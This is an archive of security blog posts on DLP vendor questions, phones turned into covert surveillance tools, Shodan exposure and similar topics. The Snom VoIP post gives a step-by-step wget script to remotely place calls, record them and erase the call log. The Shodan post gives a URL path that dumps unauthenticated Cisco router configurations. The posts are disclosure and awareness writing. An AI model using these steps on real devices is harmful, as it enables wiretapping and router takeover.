Author Archives: Shawn Merdinger

Data Loss Prevention: 10 Technical Questions To Make Your Vendor Squirm

“There’s a war out there, old friend. A world war. And it’s not about who’s got the most bullets. It’s about who controls the information. What we see and hear, how we work, what we think… it’s all about the information” — Cosmo, Sneakers (1992)

The headline news of Wikileaks has drawn considerable attention to the huge, intractable problems of digitized data and how much a single individual can damage an organization, business or nation-state. But these issues are not just with Wikileaks, as the recent breach of gaming leader Blizzard resulted in disclosure of business plans and product roadmaps.

Blizzard Product Roadmap
blizzard pwnage

With this focus on DLP, some insightful commentary is out there. In particular, Gary Warner in his Wikileaks: Lessons Learned blog post discusses the subtleties of data classification versus data categorization, and outlines a pragmatic approach to detection, such as frequency of access monitoring across these defined planes. This article is well worth the read. Another good, and short blog post is from Neil MacDonald at Gartner, who advocates redefining “Data Loss prevention” as a subset of “Data Lifecycle Protection” — a really good point.

These are going to be heady times for DLP (Data Loss Prevention) vendors, and we can expect to see DLP solutions become as popular as the late 90’s and early 2000’s security mantra of “we have to install antivirus and firewalls.” Many organizations are seeking and will continue to seek technical solutions to gain control over data exfiltration. As expected, many DLP vendors are offering “the perfect solution” that promises to fix your problems.

In my view, however, I’m seeing vendors either unaware or willfully ignorant of the many technical means to exfiltrate data over the network in a surreptitious manner. And put simply, their products and solutions can’t begin to address these threats.

To provide folks with some ammo to use for Q&A with DLP vendors, I’ve come up with the following 10 questions. The first few are easy, and the DLP vendor probably has some type of coverage. However, as the questions progress, you can expect to start seeing blank stares, and hearing the hemming-hawing and mentioning of “it’s on the product roadmap — just wait one more quarter” and “we’ll check with our engineers and get back to you” — always my favorite vendor answers 😉

1. How does it inspect SSL traffic?

This is a softball question, with the likely answer being some kind of man-in-the-middle decryption scheme, possibly having to use another vendor’s hardware. The follow-up to this is: What about Stunnel?

2. How does it inspect services like Dropbox, EverNote, etc.?

Another softy, but starting to get a little more difficult because we’re dealing with multiple consumer services.

3. Inspection of various consumer communications over IM like AIM, Google Chat, etc.?

Lulling them into complacency, this should be a gimme question with no problem answering.

4. Does it do any metadata analysis is conducted on documents (.doc,.xls, .pdf, etc.) or images (.png, .gif, .jpg, etc.)? What about video files (.avi, .mp4, etc.)?

You should expect some raised eyebrows on this one.

5. Does it do any steganography analysis of images?

Some will say yes, others no. If yes, the follow-up question is: How do you do this? There are literally hundreds of steganography tools — do you have strings or signatures that you’re looking for from all of these tools?

6. You product probably blocks well-known P2P like Limewire, Bearshare, etc. What about private P2P networks like WASTE?

7. What about VoIP, including encrypted ones like zphone, Skype, Cisco Skinny? Specifically, does it inspect for DMTF tones?

“It’s on the roadmap” will be most likely answer.

8. Does it block/ inspect advanced data exfiltration tools and tactics?

This will be perhaps the most exciting Q&A. Be sure to do your homework on these tools and techniques!

9. How does it inspect TOR traffic? TOR hidden services?

Expect audible groans.

10. How does it address IPv6 tunneled inside IPv4?

Expect quizzical looks.

Hopefully this will enlighten you about some of the methods attackers will use to perform data exfiltration. And will also provide you some good questions to beat up vendors after they take you out for lunch or golf. At the very least, you can expect your DLP vendor to mention that nobody has asked some of these questions of them before 🙂

Weaponizing the Nokia N900 – Part 3

Welcome to the 3rd post in my series of leveraging the power of the Nokia N900 utilizing opensource, cutting-edge security tools for espionage/ethical penetration testing.

As mentioned in my last article, I’m continuing to focus on available, easily installed and free tools. This post will cover more scary security-related applications for the Nokia N900, in particular the ability to control the N900 via SMS.

I’ve been scoping tools for the N900 that will place a call surreptitiously and will cover two here: BabyPhone and SMSCON.

BabyPhone

babyphone

BabyPhone for the N900 is a monitoring application that uses the N900’s microphone to listen for a predefined noise threshold, like a baby crying, and then initiates a phone call to the configured number.

From a potential espionage/pen-test standpoint, I found this an attractive application in the sense that it’s useful to kick off a call when there’s ambient noise in the target location, such as an executive conference room. However, I had some problems with the microphone — not with the sensing part that listens for noise and then initiates the call, but rather after the call was placed, I could not hear anything. This might be a issue with my phone, and some quick searches for others with this problem proved fruitless.

Were the mic working, I might have stuck with this application and not looked further. In retrospect, it’s fortunate that it did not work, as I was forced to look for other applications and found a killer one called SMSCON.

SMSCON

smscon

SMSCOM is an application that allows you to control your Nokia N900 via SMS messages to the phone. Clearly, from a espionage/pen-test perspective this kind of remote control over a cellular network using SMS is a powerful tool, and is basically allowing you to send SMS commands to a Linux box, which is what the N900 is at the end of the day. SMSCON is also useful as a poor man’s Lojack in that the remote control aspects allow you to pull GPS data, take pictures of the perp who stole your phone, SMS the new SIM card information when a replacement SIM is inserted into the N900, etc.

SMSCON has a companion program called SMSCON-EDITOR which which provides some basic pre-configured options and templates to add in various parameters like phone number to call, email address, etc. There are some other options, such as a reverse SSH session from the phone to a SSH server, thereby allowing you to connect to the external SSH server, and then connect back to the N900 through the established SSH tunnel on the external server…very old skool but still slick and an effective means to traverse NAT, firewalls, etc.

Another SMSCON-EDITOR option allows you to kick off a Bash script on the N900 via SMS. Really, with all the bells and whistles and pretty GUI of SMSCON, this single function is the one single thing that a skilled attacker would need to do in using the N900 in a espionage/pen-test scenario. Think of leaving the N900 at a target site, and then sending the SMS to kick off your custom bash script that does any number of things, such as bluetooth scanning, firing up the N900 wireless adapter for sniffing, calling a phone, etc. One of the slickest scripts will send a SMS when the N900’s keyboard is opened or closed, providing a useful means to determine if the target has discovered and is handling the N900 you covertly placed on-site for your espionage/pen-test engagement. Pure evil.

Of course, it would be great if all the functions and scripts worked right. With both the SMSCON and SMSCON-EDITOR programs plenty of functions that work, but some do not, and there are plenty of bugs and non-functioning glitches to SMSCON and SMSCON-EDITOR at this time. That said, the good news is that both projects are active and bugs are getting fixed. Both of these are definitely programs to watch, but even so, they have provided the basic framework from which to build your own tools that leverage the N900.

Use The Source

Especially useful about SMSCON is that it’s written in a nice Python script. Having a plaintext script as opposed to a compiled binary is excellent as it allows a few things, such as seeing exactly what is going on under the covers. Wondering how the N900 sends a SMS? Read the script. How does the N900 access the front camera, take a photo of the user, and then email it? Read the script. How does the N900 make a cellular call? Read the script.

Overall, the usefulness of this written in Python is huge, and it allows the savvy user and coder to pull functionality from the SMSCON Python script and roll-your-own mini-tools to do specific actions on the N900. I’m not a coder, but even with my meager coding skills I can read through the well-documented and clean SMSCON Python code and figure out quite a bit.

If you’re planning to use SMSCON be sure to check out the Maemo forum thread for SMSCON — it will save you time and answer many of your questions.

Well, that’s it for this post, hope you’ve enjoyed it and that the information helps broaden your view of what kinds of tools and software can be leveraged on COTS gear for espionage/pen-testing engagements. As for what’s next, I’ve been working with some of the wireless tools like Aircrack-NG and Kismet on my N900 and will likely make that the next blog post, or soon thereafter, in this series.

Weaponizing the Nokia N900 – Part 2

Welcome to the 2nd post in my series of leveraging the power of the Nokia N900 handheld using opensource, cutting-edge security tools for ethical penetration testing.

In keeping with the theme, the idea is to cover security-related tools and applications that enhance the N900’s offensive capability.  Recall the initial focus is on tools that are available, easy to install and require low technical expertise — that is, expertise in terms of installation, not actually running the tools in a network attack scenario. You’ll have to learn that on your own, and IronGeek is a great place to start.

As the blog series progresses, I’ll cover more unique tools and cutting-edge stuff,  I’m still working with a production phone that I can’t risk ‘bricking’ — however, if anyone’s interested in supporting advanced security tool support and research on the Nokia N900 platform and seeing the results posted here on infosecisland, please drop me a note offline.

NeoPwn Update — BETA versions leaked, possible malicious modification

In Weaponizing the Nokia N900 – Part 1, I mentioned the upcoming release of NeoPwn, a software image designed specifically for the Nokia N900.  The software is still unreleased, but there’s been a BETA test going on.  Unfortunately, someone in the BETA program has re-released the BETA into the wild, and quite possibly did some malicious modifications.

A warning, if you’re trying to go trolling around the Torrent sites or RapidShare for this leaked NeoPwn image, I’d suggest you re-think that strategy.  Not only will you possibly get a bad, or trojaned image, but you’ll also drain support from cool projects like NeoPwn — I think that specialized projects like this that take alot of time should be supported, and it’s worth paying for this kind of effort.

Oh, and bonus points for locating and publishing analysis of a trojaned N900 NeoPwn BETA image!

Easy Debian with LXDE

Easy Debian on the Nokia N900 is super-easy to install, well-documented, and provides you with a full desktop environment that is separate from the underlying OS.  Here’s a nice 8-minute video on Easy Debian on the N900, and to get you started, there’s great documentation on the Maemo Wiki.

Basically, you can install Easy Debian LXDE using the GUI application manager.  It’s a snap, and easy to back out of if you want to. With this package you get a full Linux distro that runs on top of the N900’s native OS — think of it as similar to running a VMware appliance image on a host.

Once you have Easy Debian and LXDE installed, you can begin to add the kinds of security tools  that would typically install on a full-fledged desktop!  Think a full version of Nessus, both client and server, running on the N900 in LXDE.

It’s totally doable, albeit these packages can be a bit of a drain on the CPU and memory — that is, it’s workable, but don’t expect snappy and fast.  Still, running the Nessus client and/or daemon on this device is a useful feature — serious security tools like Nessus running on a compact phone-sized device open awesome possibilities for covert testing in on-site ethical penetration testing engagements.

If you’re contemplating adding several security tools for the N900, definitely look into adding the Easy Debian LXDE package.  Overall, it makes life much easier and enables you to play around with a full OS without modifying the base OS on the phone.

There’s potential here for custom LXDE images for the N900 as well.  Could be an interesting project…

It’s noteworthy that from a law-enforcement forensics standpoint, the N900 presents an advanced challenge.  If LEA are going after more than the removable SIM, the “virtual image” Easy Dedian LXDE capability makes it more of a challenge for airport cell phone siezures and subsequent analysis.

The potential for running LXDE with an encrypted filesystem will add to this forensics challenge in the future.  On the flip side, it’s also a useful privacy enhancement, and can aid in the unwanted intrusion into private data.

LiveCast Mobile for N900 — Poor Man’s James Bond Espionage Tool?

It’s worthwhile to cover several applications that can turn the N900 into a powerful multimedia broadcasting device — or in terms of espionage a “corporate green killer, bean spiller” as Boots from “The Coup” might say.  I’m going to only focus on one for now, and will expand on others that are worthy in future posts.

By far the scariest I’ve seen so far is the Livecast Mobile.  This app will allow you to stream to a webserver live audio and video from the N900.  What’s interesting is you can set either of the two cameras on the N900 — while front camera’s red LED is illuminated when the software is running, there’s no indication if the front camera is used, which has lower resolution, but is much more covert.

Speaking from personal experience, it’s a bit unnerving to fire this app up, leave the N900 on a table, go to another room, go to a Livecast webpage and see live video and hear live audio from this phone — going out to the Interwebs — to the Livecast servers — back to my PC browser.  Yikes.

Think about that next time you’re in a highly confidential meeting and a N900 (or any of several phones) are lying on the table, or “forgotten” on a chair or end-table.  For that matter, anyone check above the ceiling in the plenum in your company’s corporate boardroom lately? 🙂

All kidding aside, clearly, there are a number of legal issues with using this kind of application, so be aware of the risks and liabilities.

Coming Up Next…

Some of the things I’m going to focus on in upcoming articles for the “Weaponizing the Nokia N900” series includes:

  • More scary applications for poor man’s espionage
  • Using the Nokia 900 for wireless attacks, including WEP/WPA capture and cracking, packet injection, Kismet on the N900, etc.
  • FakeAP and Karma type attacks — turning the N900 into a rouge AP that does MITM, etc.
  • USB Ethernet to add a third data interface (wifi, cellular, US)

It’s a Feature! — Remote Tapping a Snom VoIP Phone

I have a bit of history in attacking VoIP phones, specifically VoIP Wifi phones. Way back in 2005-2006 I purchased several VoIP Wifi phones and conducted very basic security analysis to demonstrate a commonality of vulnerabilities, most notably that many of them had a number of open ports and extraneous services.

This research resulted in several CVEs, including some companies that should have known better. I also spoke a few conferences, and you can check out my Shmoocon slides from 2006. Most importantly of all, my findings of the VXworks debugging port of UDP/17185 was recently deeply expanded upon by none other than HD Moore who released research and a set of tools that is truly awe-inspiring when it comes to attacking VXworks debugging. For myself, it was humbling to see HD take this to a level that I can only dream of someday attaining.

So, last week, Michael Sutton at Zscalar wrote a blog post about misusing a new feature in HP Printers called WebScan. Essentially, WebScan functionality allows a user to scan a document that is physically on the printer and save the image to the local computer. HP’s WebScan is an excellent example of how a device’s features are all too often are leveraged by attackers, and Michael’s post inspired me to look at some recent features ripe for abuse in VoIP phones.

One area that I wanted to revisit is attackers able to control a VoIP phone dialing. Back in 2006 I identified a feature in Clipcomm VoiP Wifi phones that would allow an attacker to log into the phone via telnet and place a call from the VoiP Wifi phone to any number. Pretty bad stuff, right?

Looking at some of the newer VoIP phones from Snom, however, and there’s a webpage on the Snom’s webserver that allows one to enter in a number to dial. A useful feature, so long as your Snom has authentication set on the webserver, otherwise anyone with access to that webpage can make a call. From the Snom user’s perspective, this feature will start a call from your Snom on the speakerphone.

So, with this kind of feature, an attacker could search for Snom phones exposed on the Internet, determine if they are using HTTP authentication, and if they are not, could easily connect the the Snom VoIP phone’s webserver and punch in the number to dial — clearly opening up avenues to cause grief such as expensive 900 numbers, prank calls, etc.

Really, this is not a big deal, and is more of a headache than anything else. But what if an attacker could remotely capture on the phone the voice streams from a call that she placed? That ups the ante a bit, and such an attack is possible by abusing features!

Snom VoIP Phone PCAP Trace

Some Snom VoIP phones have a feature called “PCAP Trace” that allows, via the web interface, the start/stop and download of a PCAP file on the Snom VoIP phone — the screenshot below shows the actual page on the VoIP phone, a Snom 360 in this case.

The Snom PCAP Trace feature does have limitations in that it the PCAP data is stored in a circular buffer because of memory limitations, and that enabling PCAP capture can impact the phone’s performance (no surprise here). Still, it is a scary feature that if not secured creates an attack vector where a remote attacker can literally tap your phone.

Remote Tapping Your Snom VoIP Phone

To start/stop a PCAP on the Snom VoIP phone, one just clicks on the ‘Start’ or ‘Stop’ buttons on the phone webpage. After the capture is complete, an attacker can then download the PCAP trace and extract the audio using Wireshark or the amazing command-line RTPbreak by Michele Dallachiesa.

So, combining the web page place call feature with the PCAP trace feature, an attacker can make a Snom VoIP phone call any number and then the attacker can capture the call remotely on the Snom VoIP phone. For the final touch, an attacker can also delete the call record of the last call made, thereby wiping the apparent record of the call, at least on the Snom VoIP phone itself. Scary? You betcha. The following is a walk-through of the seven steps — you can code this up for yourself or download my handy-dandy snom_call_tap.sh script — please do be ethical and responsible with this script.

Poor Man’s NSA — Step-by-Step

Step 1: Start the tap on the Snom Web interface
wget –post-data=’start_pcap=Start’ $1/pcap.htm -O logz_$1/start_pcap.html

Step 2: Place the call to the target through the Snom Web Interface
wget –post-data=’NUMBER=’$2’&DIAL=Dial&active_line=1′ $1 -O logz_$1/place_call.html

Step 3: Stop the tap on the Snom Web interface
wget –post-data=’stop_pcap=Stop’ $1/pcap.htm -O logz_$1/stop_pcap.html

Step 4: Pull the PCAP from the Snom Web Interface
wget http://$1/trace.pcap -O logz_$1/trace_$1.pcap

Step 5: Run RTPbreak to extract the RTP stream from the PCAP
rtpbreak -P2 -t100 -T100 -d logz_$1 -r logz_$1/trace_$1.pcap

Step 6: Run SOX to marry the extracted audio into single WAV file
sox -r8000 -c1 -t ul logz_$1/rtp.0.0.raw -t wav logz_$1/0.wav

Step 7: Delete the last call record to cover tracks
wget http://$1/adr.htm?dialeddel=1 -O logz_$1/del_call_log.htm

So, there you have it. What makes this kind of feature especially problematic are two things. First, known vulnerabilities in some Snom phones allows an attacker to bypass authentication. Second, Shodan, which I’ve written about before here and here, makes it easy for attackers to locate vulnerable Snom phones. I leave following-up on these aspects an exercise for the reader.

Mitigation

Don’t like the possibility of some miscreant controlling your Snom VoIP phone, making calls on your behalf and tapping your calls? I expect that you don’t. Here are some humble suggestions to mitigate help you to mitigate your risk.

  • Avoid putting VoIP phones on public IP if at all possible
  • Use latest code for VoIP phones that patches known vulnerabilities
  • Enable authentication on the VoIP phone’s Web interface and use a strong password
  • Send logs from phone to another server and review for abuse
  • Train phone users to recognize their VoIP phone is compromised (slow running, makes calls by itself, etc.)
  • Demand from vendors firmware images that do not have such dangerous functionality — or at least have more authentication to use this kind of “feature”
  • Support alternatives like the Open Snom Project
  • Revisiting Shodan Computer Search Engine: Oh Noes, the places you’ll go!

    I’m sorry to say so
    But, sadly it’s true
    That bang-ups and hang-ups
    Can happen to you

    — Dr. Seuss, "Oh, the places you’ll go!" (1990)

    Back in January 2010, I wrote a short blog post about Shodan and VoIP devices and mentioned that it’s a site well worth revisiting.  Well, that time has come, and there’s plenty more to talk about when it comes to Shodan.

    What is Shodan?

    It is a publicly available, searchable database of pre-scanned networked devices.  The scanning includes banner results from common services like telnet and http, and is akin to fingerprinting.  One way to look at it is like Rainbow Tables for networked devices.

    What’s the risk?

    When a new vulnerability is discovered, Shodan makes it easy for attackers to search for vulnerable devices without actively scanning.  For example, say a vulnerability is published about Apache Mod_Security — an attacker can easily search Shodan for vulnerable version and then launch an attack to pwn the box.

    Attackers can also use Shodan search filters and really narrow down search results, by country code or CIDR netblock for example.  You do have to register for more specific search functionality if you’re interested in say, the 24 Cisco boxes in Iran with no authentication.

    Pssst….wanna Pwn 7000 Cisco routers/switches?

    Yes you can.  And only because some network admin didn’t know how to configure HTTP authentication.  It’s easy peasy with Shodan’s most popular search.  Click on the resulting IP addresses from that search and you’ll get the HTTP interface of a Cisco router/switch with no authentication.  Add "/level/15/exec/-/sh/run/CR" to the IP address and you’ll get the "show running configuration" output of the device.  Understand what’s going on here.  An attacker can easily add an admin-level account, change the configuration, crack the listed Cisco passwords in the configuration to target other devices on that network, etc. 

    Why should I care?

    Shodan creates risk by making poor configurations and other adminstrator mistakes much more visible to potential attackers.  It also creates risk by providing a pre-scanned inventory of potential targets.  I’ve seen some amazingly frightning devices discovered through Shodan that are wide open and have no authentication — for a few examples:

    • An Eastern European country’s SCADA water treatment network
    • A switch controlling the Neurosurgery VLANs of a hospital
    • Physical security door access controller systems
    • Routers with VoIP configurations
    • and plenty more….

    These are just a few examples of the micro-risks.  I think from a macro-risk perspective, specifically concerning the Cisco routers with no authentication, is the very possible and easy mass takeover of routers and potential for BGP attacks.  Not possible?  Well, think back to early 2008 when Pakistan modified BGP routes to block YouTube and because of a misconfiguration, large swaths of the Internet outside of Pakistan could not access the site. This was the result of a error from a few routers broadcasting bad BGP routes — now imagine if an attacker does this with a few thousand routers distributed globally?  I think it’s really only a matter of time…

    What should I do?

    There are tangible steps you can take.  First and foremost if to register fora free Shodan account and search for devices on your organization’s CIDR netblock.  If you are working with buisness partners that are connected to you, check their CIDR netblocks in Shodan as well.  Make a stink and inform the right network and security people of the risks of Shodan exposure.

    Or

    You can do nothing, and let Shodan determine your fate.  Your choice.

    Risks Of Phone Removal From University Dorm Rooms

    Risk:  A Growing And Disturbing Trend
     
    Today the Washington Post and WSJ Blog both reported on a decision by the University of Virgina Housing Division to remove phones from student dorm rooms.  The obvious justification for the decision is the cost associated with providing phone infrastructure residence halls, in UVa’s case over 500K annually.
     
    I can understand the financial predicament many universities find themselves in today’s economy, and clearly students in general are more frequently choosing mobile communications.  Further, it’s noted in the articles that the university intends to provide dedicated phones in the hallways for emergency calls.
     
    Still, I suggest this elimination of dorm phones is going to result in increased risk to students and residence hall staff.  For what it’s worth, I speak from 6 years of experience as a former resident assistant and hall director in residence halls at large public universities.  While this was several years ago, and before the widespread use of cellular phones on campus, the technical and social impact of losing dorm landlines raises several troubling issues.
     
    Risk:  Cellular versus Landline Reliability
     
    First and foremost, having hardline phones in individuals’ dorm rooms provides a constant, always-available, and above all, reliable phone connection.  With the network and cellular connection problems we all constantly experience, which by-the-way we’ve have little insight into the reasons for years, having the peace-of-mind of a reliable hardline should not be dismissed lightly.  If you were starting a business with a office, would you rely soley on a cellular phone?  What would be your reaction if you checked into a hotel and there was no phone? 
     
    Risk:  Emergency Location (e911) Issues
     
    If you have children at home, would you choose not to have a landline?  Probably not, even if you provide them with mobile phones.  You might say this is not a fair question in the context of college students, of whom most are technically adults over age 18.  I’ll counter this with the fact that a typical dorm has students from all over the country and world together in a close-quarter living environment.  As any residential life staff can tell you, the potential for conflict outbreaks of all kinds and levels is a constant threat, and it’s important to remember that these students come from a variety of backgrounds and all have their problems and issues that become magnified in a close-quarter living environment.
     
    From my own experiences as residence hall staff, I’ve handled everything from common roommate conflicts, breaking-up floor parties, suicidal residents, theft/vandalism, residents unconscious from alcohol/drugs, weapons, physical fights, etc.  In every case, having a phone nearby proved invaluable. 
     
    Perhaps an even more important point, on one university campus we had e911 which provided the emergency operator the actual room location from where the phone call was made.  On another campus we did not have that feature, and precious time was lost in the task of determining the call location — in fact, several instances of students dialing 9-911 resulted in them accessing off-campus emergency personnel, resulting the in the time-loss of transferring the call back to campus emergency resources.  And this was the case of landline phones in all rooms — we can expect more confusion as these calls will now go over cellular networks.
     
    While the location capabilities of many cellular phones and e911 is available, the difficulty in pinpointing location should not be overlooked.  Aside from the network congestion and coverage issues I alluded to earlier, in many residence hall situations the building is a multi-story residence.  Expecting cellular e911 to provide emergency responders accuracy to the floor and room is unrealistic in the best of circumstances.  The impact of this is going to be more confusion and lost time in responding to residence hall emergency calls made over cellular.
     
    Risk:  Losing A Known Point of Contact
     
    An overlooked benefit of landlines is that one knows the actual location one is calling (assuming call-forwarding, etc. is not in play).  In the case of dorm rooms, residence hall staff have a listing of all room phone numbers.  Many, many times I’ve used this list to initiate contact with a dorm resident, from trying to determine if someone was in the room without having knocking on the door, following-up with a sick resident or a resident with a disability, or tactically approaching a room party by talking one-on-one with the room’s resident rather than facing a room party and hostile audience in the doorway.
     
    The removal of individual room phones means the loss of a valuable tool in residence hall staff’s toolkit. The ability to initiate contact over the phone to a known room should not be discarded lightly, and the loss of these phones means residence halls staff are losing a tactical advantage.
     
    In the case of roommate and other domestic conflicts, several times I’ve seen a fight escalate to the point where one of the parties called 911.  In some cases, the resident hung-up the phone immediately, before stating the issue to the emergency operator.  Of course, since the call was made from a room landline, and state law required the emergency response to the call location, soon after the university police would arrive at the room.  Often this resulted in the arrest, or referral to student affairs, or the people involved, which lead to them getting assistance. With cellular phones, this response is impaired greatly, and I fear that escalating situations will not reap the benefits of current landline and police response capabilities.
     
    There are some potential loss of privacy issues for dorm residents here as well.  In the case of most landlines, one can more easily choose to block their outgoing caller-id, a useful feature if a dorm resident is calling a crisis line or making inquiries on a subject they wish to remain anonymous.  The ability to do this in private, from ones room, is critical; the common-area landlines in the halls are not going to provide this physical privacy, and given the location of the phones it would not surprise me if the ability to block outgoing caller-id is disabled.  Why?  Because I expect the amount of crank calling from common area phones in dorms will increase by orders of magnitude…
     
    No Easy Answers
     
    Unfortunately there is no easy solution to this dire situation.  Universities, especially in the public sector, are forced to make cost cuts in this poor economy, and telecommunications overhead like dorm phones is a easy measure to take, but the increased risk and costs are at this point not worth it.  The replacement technologies, such as relying on student’s to have cellular phones, or even VoIP phones replacing landlines in dorm rooms, still lack the same robustness in emergency response features that we’ve relied upon on grown accustomed to over the years.  Still, like it or not, the removal of dorm phones is a trend gaining in popularity and we’re only going to see more campuses choosing this path.  To this end, some recommendations I have are:

    • Ensure that student’, and their parents, are made aware of the issues and risks of not having a landline, as well as the benefits

    • Prioritize cellular e911 location tracking on college campuses

    • Require residents with disabilities to have a landline

    • Provide residence hall staff with resident’s cellular numbers

    • Provide a privacy booth for landline phones placed in common areas to enable students to make calls with some level of privacy and caller-id blocking

    Weaponizing the Nokia N900 – Part 1

    In the 80s movie “The Color of Money” there’s a great scene where a player challenges Tom Cruise’s character to a game. He strolls up to Vincent and says “So what you got in there?” — to which Vincent replies. “Doom.”

    This is akin to how I felt a few weeks ago after I finally got ahold of a Nokia N900 smartphone. Calling it a phone is a bit of a stretch, as it is primarily a Debian Linux tablet with impressive hardware specs and a huge number of .deb packages available for installation…oh, and you can make cellular phone calls with it. Many people use this phone, and despite some glitches it is rapidly developing into a formidable platform for security tools and penetration testing.

    Broadly speaking, the objective of this series of blog posts is to introduce folks to the tools available and the potential for this phone as a security testing platform. Given the fact I’m a bit late in obtaining this phone, some smart people out there have already started to address the n900’s capabilities and available tools, and I would be remiss not to mention, and build upon, their insightful work. The key phrase here is “build upon” and get the word out, not to steal or simply re-hash their fine work and efforts!

    I’ve one caveat to this series of blog posts. As my n900 is for now a “production phone” for me in that I need to use it and can’t brick it just yet, the path of this blog series on “Weaponizing the Nokia N900” will progress from known, tested and functioning security tools on this phone — and therefore lower risk of bricking — to more advanced, edgy tools that require more tweaks and modifications, such as replacing the stock kernel. If someone out there finds this series useful, and has interest in furthering research on running security tools on the n900, I’d welcome the donation of a n900 for development and testing, and would credit them for their support. Please ping me offline if you’re interested 🙂

    NeoPwn and the Nokia N900

    One project to watch in particular is the upcoming release of NeoPwn, which is based on BackTrack and bills itself as the “First Ever Network Auditing Distribution for a Mobile Phone Platform” and is due for release sometime this month, hopefully before DefCon. I am fortunate to be in the BETA and will write up a blog post for this series on NeoPwn once I get full access to the NeoPwn toolset.

    Worthy Resources on Nokia n900 Security Tools

    1. Metasploit on the Nokia n900. ‘Nuff said.

    metaspolit n900

    2. knownokia.ca Blog SimonLR wrote an excellent post on “Using the N900 for Fun and Profit” that covers several awesome tools, such as Metasploit, Dsniff, SSLstrip, Aircrack-NG, etc. He’s clearly savvy and his future blogging on tools for the n900 will be great to see.

    3. Asterisk on the n900

    Asterisk n900

    When I added the extra package repositories to my n900, I was more than a bit surprised to see a full version of Asterisk available as a .deb package. Wow. Think about this for a moment. One can run a full Asterisk server on a phone in their pocket. The capability of Asterisk on the n900 could enable attackers to do all sorts of mischief, such as running the SPITTER tool from their pocket as a simple example. From a surveillance aspect, think of “bad people” with n900s in their pockets running Asterisk servers on their phones and connecting to each other point-to-point over encrypted tunnels — now that’s a challenge.

    Stay tuned for more posts on “Weaponizing the Nokia N900” 🙂

    Linux crash on a Plane!

    I don’t travel nearly as as much as I used to, yet when I do I always keep a sharp eye out for the technical glitches in devices around me in travel environments. What can I say? It provides me endless amusement.

    Linux crash plane

    While Linux boxes crashing in airlines’ on-board entertainment systems are nothing new, and several photos exist on the Internet depicting these crashes, I’m seeing something different these days…

    On my way back from ph-neutral security conference in Berlin, I took a Continental 757 back to the US and observed the passenger entertainment system headrest in the row in front of me was frozen on the the movie selection GUI. The passenger in that seat asked the flight attendant to fix the problem and the headrest PC was rebooted from somewhere up front.

    So, the funny (and a bit scary perhaps) bit is the screenshot I took of the reboot process. You can see the very high resolution photo here: http://tinyurl.com/linuxonplane

    Observations from the linux crash on a plane photo:

    1. 172.17.X.X private IP address range

    2. FTP server IP address and transfer of system log tarball to the FTP server…user is “xxxxx” — imagine what the password might be…

    Some reasonable concerns:

    1. Tilting up the headrest PC and peeking behind it I saw CAT-5 cable. With a small tool or hands, and big cajones, an attacker *could possibly* unplug that cable and attach it to a laptop and hop onto the entertainment network. In addition, with some imagination and the right tools, an attacker could feasibly take over some or all aspects of the headrest PCs, including perhaps the sniffing of credit cards used by patrons, or even adding some specialized content…

    2. This aircraft did not have on-board wireless Internet access, but I suspect that some airlines offering this service could have network crossover connectivity to different subnets, or perhaps only relying on VLANs for separation.

    In the end, we can only hope that of the several networks likely running on a modern passenger jet, that true air-gapping is taking place and these systems are in no way connected to critical on-board networks. Time will tell if this is indeed the case. In the meantime, keep an eye out for those Linux boxes crashing on planes!

    Chisco: Welcome To The Hunan Network?

    chisco!

    On NPR’s ‘Fresh Air’ this week, Richard Clarke made some great points, in particular with the logic bomb scenarios of sneaking in code and untrustworthy hardware. While this is old news, it’s still a very real threat — recall that Chisco devices were discovered on US government networks and disclosed back in 2008.

    With Richard Clarke’s story in mind, I think it’s worth re-visiting the “Chisco” problem. This article below is from three years ago, yet this same Chisco eBay seller mentioned, “Sincere Networking” is still up and running (ya gotta love that name, no?). Bear in mind this is just one of many Chisco eBay stores — that is, there are plenty of others moving all types of Chisco gear on eBay, including routers, firewalls, switches. We are way beyond WAN NIC interfaces folks.

    Why can’t these get shut down?

    Network World: “eBay ‘Chisco’ stores are selling fake Cisco products originating in China”

    This counterfeit gear has already landed on plenty of networks, and it’s likely to continue. Just like the FBI’s conclusion on slide 10, I agree that a huge risk in this area stems from small ‘mom n’ pop’ subcontractor outfits that choose to purchase this gear on the cheap from eBay, and then charge-back their own clients for the list price on CCO. Of course, that dirty network engineer in your organization could do a swap-out with Chisco gear during your next change management window — and in these economic times perhaps merely to re-sell the valuable real card rather than backdoor the organization’s network.

    That said, recent security conference presentations, such as CanSecWest’s “Can you still trust your network card” should be at the forefront of the discussion when this Chisco topic comes up.

    I know this is a dirty subject. It’s so dirty that very few folks even want to discuss it. It’s a nightmare. But like it or not, it’s going to be up to you to make sure that your gear is legitimate, especially if you’re on a US government network as according to the FBI’s presentation on slide 40, “Cisco’s Brand Protection does NOT coordinate with Cisco’s Government Sales”

    Here’s a few links to hopefully get you started on the right path.

    Comments with additional resources are most welcome.

  • Brad Reese — most outspoken person about this issue
  • FBI OMB Presentation: 2008-01-11
  • Cisco Statement on Counterfeit Goods
  • Cisco Blog: Protecting Against Gray Market and Counterfeit Goods
  • eBay: a hacker’s source for acquiring remote monitoring medical devices for security testing?

    turtle

    Awhile back I blogged on VOIPSA about medical devices using VoIP. This is a follow-up to that post, and is a bit more tangible in that these devices are showing up on the auction sites.

    I typically check eBay weekly for medical devices showing up, with an eye for anything with a network interface.

    Bluetooth-enabled devices abound, but the (mis-perception) that an attacker must be physically close decreases popular interest from a security testing perspective. In contrast, it’s a box “on the wire” that enables an attacker in say, Palau, to to reach out and provide what I’d call a “negative home medical monitoring experience.”

    So what’s on eBay?

    Here’s a ViTel (now owned by Bosch) device and blood pressure monitor on eBay that’s a few years old, but has the ability “…to communicate via standard telephone line, broadband, or cellular and does not interfere with existing telephone service.”

    ViTel Net Turtle 400 & A&D UA-767PC Blood Pres. Monitor
    eBay Link: http://tinyurl.com/yytwgma

    Suggested for discussion:

    1. Should vendors of these devices be concerned about their sale on site like eBay? Why or why not?

    2. Are there any available business services that monitor the after-market sale of these devices?

    3. Would/should vendors care about re-acquiring these devices?

    4. How interesting / valuable would it be to conduct a security analysis on this device, report the findings to CERT, and publish at DefCon or BlackHat?

    5. Does a diagram like the one below concern anyone?

    scary